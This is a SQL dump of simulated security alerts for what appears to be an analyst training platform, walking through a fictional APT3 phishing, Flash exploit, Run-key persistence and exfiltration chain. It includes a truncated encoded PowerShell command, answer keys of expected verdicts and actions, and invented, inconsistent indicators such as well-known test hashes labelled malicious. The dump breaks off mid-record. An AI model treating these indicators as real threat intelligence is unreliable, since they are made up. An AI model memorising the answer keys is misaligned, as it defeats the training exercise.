(1220, 'Initial Access via Phishing Campaign', 'high', 'Email Gateway Logs', 'APT3 initiates a phishing campaign by sending spear-phishing emails containing links to a compromised website hosting the CVE-2015-3113 exploit. The campaign aims to deliver a malicious Adobe Flash exploit to the target organization.', 'Phishing', 'T1193', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-18T14:32:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"email_subject\":\"Urgent: Security Update Required\",\"sender_email\":\"security@update-alerts.com\",\"recipient_email\":\"john.doe@organization.com\",\"url\":\"http://compromised-site.com/flash-update\",\"attachment\":\"AdobeFlashUpdate.exe\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"email_id\":\"message-id-123456789\",\"mime_type\":\"application/octet-stream\"}', '2026-02-07 21:28:52', '2026-02-19 15:50:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known APT3 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://compromised-site.com/flash-update\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Threat Exchange\",\"verdict\":\"malicious\",\"details\":\"Site hosts malicious content related to CVE-2015-3113.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with APT3 malware.\"}},{\"id\":\"artifact_5\",\"type\":\"email\",\"value\":\"security@update-alerts.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Database\",\"verdict\":\"malicious\",\"details\":\"Email associated with phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Phishing Campaign\",\"date\":\"2026-02-08T19:00:02.546Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1221, 'Execution of Exploit Code', 'high', 'Endpoint Detection and Response (EDR)', 'Upon visiting the compromised website, the victim\'s unpatched Adobe Flash Player automatically executes the embedded exploit, allowing APT3 to gain a foothold.', 'Exploit', 'T1203', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-01T14:23:45Z\",\"event_id\":\"EDR-20231001-001\",\"source_ip\":\"192.168.10.15\",\"destination_ip\":\"203.0.113.45\",\"file_name\":\"flash_exploit.swf\",\"file_hash\":\"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\",\"user\":\"jdoe\",\"action\":\"Execution of exploit\",\"process_name\":\"FlashPlayer.exe\",\"exploit_name\":\"CVE-2023-XXXX\",\"attacker_ip\":\"203.0.113.45\",\"attacker_domain\":\"malicious-website.com\"}', '2026-02-07 21:28:52', '2026-02-19 15:53:07', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP used by the victim machine.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT3 activity.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"flash_exploit.swf\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"malicious\",\"details\":\"Exploit file used for the attack.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\",\"is_critical\":true,\"osint_result\":{\"source\":\"virustotal\",\"verdict\":\"malicious\",\"details\":\"Hash matched with known exploit used by APT3.\"}},{\"id\":\"artifact_5\",\"type\":\"domain\",\"value\":\"malicious-website.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint\",\"verdict\":\"malicious\",\"details\":\"Domain associated with APT3 operations.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1222, 'Establishing Persistence with Backdoor', 'high', 'System Registry Logs', 'APT3 installs a backdoor on the compromised system by modifying the Windows Registry to ensure persistent access. This involves creating a registry key that launches the backdoor executable during system startup.', 'Persistence', 'T1547.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-09-15T14:23:51Z\",\"event_id\":4657,\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.105\",\"registry_path\":\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\"registry_key\":\"MaliciousBackdoor\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\backdoor.exe\",\"file_hash\":\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\",\"username\":\"compromised_user\",\"action\":\"Registry key modification\",\"description\":\"A registry key was added to enable persistence of the backdoor malware.\"}', '2026-02-07 21:28:52', '2026-02-19 15:51:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT3 activity.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known backdoor used by APT3.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\System32\\\\backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis Service\",\"verdict\":\"malicious\",\"details\":\"File found to be a persistent backdoor.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.550Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-09-15T14:23:51Z\\\",\\\"event_id\\\":4657,\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"registry_path\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"registry_key\\\":\\\"MaliciousBackdoor\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"Registry key modification\\\",\\\"description\\\":\\\"A registry key was added to enable persistence of the backdoor malware.\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.550Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-09-15T14:23:51Z\\\",\\\"event_id\\\":4657,\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"registry_path\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"registry_key\\\":\\\"MaliciousBackdoor\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"Registry key modification\\\",\\\"description\\\":\\\"A registry key was added to enable persistence of the backdoor malware.\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.550Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-09-15T14:23:51Z\\\",\\\"event_id\\\":4657,\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"registry_path\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"registry_key\\\":\\\"MaliciousBackdoor\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"Registry key modification\\\",\\\"description\\\":\\\"A registry key was added to enable persistence of the backdoor malware.\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.550Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-09-15T14:23:51Z\\\",\\\"event_id\\\":4657,\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"registry_path\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"registry_key\\\":\\\"MaliciousBackdoor\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"Registry key modification\\\",\\\"description\\\":\\\"A registry key was added to enable persistence of the backdoor malware.\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.550Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-09-15T14:23:51Z\\\",\\\"event_id\\\":4657,\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"registry_path\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"registry_key\\\":\\\"MaliciousBackdoor\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"Registry key modification\\\",\\\"description\\\":\\\"A registry key was added to enable persistence of the backdoor malware.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1223, 'Lateral Movement via Stolen Credentials', 'high', 'Active Directory Logs', 'APT3 executed lateral movement by leveraging stolen credentials, accessing critical infrastructure and data repositories.', 'Credential Access', 'T1078 - Valid Accounts', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T15:23:45Z\",\"event_id\":\"4624\",\"logon_type\":\"3\",\"logon_account\":\"victim_user\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"10.0.0.8\",\"domain\":\"CORP\",\"workstation_name\":\"CORP-WORKSTATION-05\",\"attacker_ip\":\"203.0.113.45\",\"access_granted\":true,\"involved_files\":[{\"filename\":\"critical_data.xlsx\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}],\"related_processes\":[{\"process_name\":\"svchost.exe\",\"process_id\":\"1111\"}]}', '2026-02-07 21:28:52', '2026-02-19 15:50:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used within the network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.8\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"IP address of critical internal server.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT3 activity.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"critical_data.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file accessed during unauthorized logon.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_database\",\"verdict\":\"clean\",\"details\":\"File hash corresponds to a known benign file.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"victim_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Username used to access resources illegitimately.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(1224, 'Data Exfiltration to Remote Server', 'high', 'Network Traffic Analysis', 'APT3 successfully exfiltrated sensitive data to a remote server under their control. The operation was detected through unusual network traffic patterns and data flow volumes originating from an internal host to an external IP associated with known malicious activity.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"source_ip\":\"10.0.1.15\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"file_name\":\"confidential_data.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"jdoe\",\"action\":\"exfiltration\",\"bytes_transferred\":10485760,\"network_context\":{\"internal_network\":\"10.0.0.0/8\",\"external_network\":\"203.0.113.0/24\"},\"alert_id\":\"alert_20231015_0005\"}', '2026-02-07 21:28:52', '2026-02-19 15:50:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT3 command and control servers.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Registry\",\"verdict\":\"suspicious\",\"details\":\"Hash corresponds to files often used in data exfiltration campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal File Audit\",\"verdict\":\"suspicious\",\"details\":\"File not typically transferred outside the organization.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"User account associated with recent access pattern anomalies.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1225, 'Suspicious Flash Exploit Detected', 'high', 'Intrusion Detection System (IDS)', 'APT3 initiates the attack by exploiting a zero-day vulnerability in Adobe Flash, aiming to deliver the initial payload into the target network.', 'Initial Access', 'T1190', 1, 'investigating', 136, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"IDS-2023-45789\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.105\",\"protocol\":\"HTTP\",\"method\":\"GET\",\"url\":\"http://malicious-example.com/exploit.swf\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\",\"file_name\":\"exploit.swf\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"alert_message\":\"Suspicious Flash Exploit Detected targeting Adobe Flash Player\"}', '2026-02-07 21:29:13', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with APT3 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the targeted host.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-example.com/exploit.swf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Source Intelligence\",\"verdict\":\"malicious\",\"details\":\"URL hosting a malicious Flash exploit linked to APT3.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash of a known malware file used by APT3.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.555Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"IDS-2023-45789\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"method\\\":\\\"GET\\\",\\\"url\\\":\\\"http://malicious-example.com/exploit.swf\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\\\",\\\"file_name\\\":\\\"exploit.swf\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"alert_message\\\":\\\"Suspicious Flash Exploit Detected targeting Adobe Flash Player\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.555Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"IDS-2023-45789\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"method\\\":\\\"GET\\\",\\\"url\\\":\\\"http://malicious-example.com/exploit.swf\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\\\",\\\"file_name\\\":\\\"exploit.swf\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"alert_message\\\":\\\"Suspicious Flash Exploit Detected targeting Adobe Flash Player\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.555Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"IDS-2023-45789\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"method\\\":\\\"GET\\\",\\\"url\\\":\\\"http://malicious-example.com/exploit.swf\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\\\",\\\"file_name\\\":\\\"exploit.swf\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"alert_message\\\":\\\"Suspicious Flash Exploit Detected targeting Adobe Flash Player\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.555Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"IDS-2023-45789\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"method\\\":\\\"GET\\\",\\\"url\\\":\\\"http://malicious-example.com/exploit.swf\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\\\",\\\"file_name\\\":\\\"exploit.swf\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"alert_message\\\":\\\"Suspicious Flash Exploit Detected targeting Adobe Flash Player\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.555Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"IDS-2023-45789\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"method\\\":\\\"GET\\\",\\\"url\\\":\\\"http://malicious-example.com/exploit.swf\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\\\",\\\"file_name\\\":\\\"exploit.swf\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"alert_message\\\":\\\"Suspicious Flash Exploit Detected targeting Adobe Flash Player\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1226, 'Unusual Execution of Flash Script', 'high', 'Endpoint Detection and Response (EDR)', 'The malicious payload leverages the Flash exploit to execute code on the victim\'s machine, setting the stage for further compromise. This activity was detected as an unusual execution of Flash script on the endpoint.', 'Execution', 'T1203 - Exploitation for Client Execution', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-23T14:23:45Z\",\"event_type\":\"execution\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"user\":\"jdoe\",\"process_name\":\"flash_player.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\malicious_flash.swf\",\"event_id\":\"EDR-20231023-001\",\"alert_level\":\"high\",\"description\":\"Detected execution of a Flash script exploiting a known vulnerability to execute malicious code.\"}', '2026-02-07 21:29:13', '2026-02-19 15:48:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known command and control server involved in multiple campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a known Flash exploit payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_flash.swf\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR\",\"verdict\":\"suspicious\",\"details\":\"Suspicious Flash file executing on the 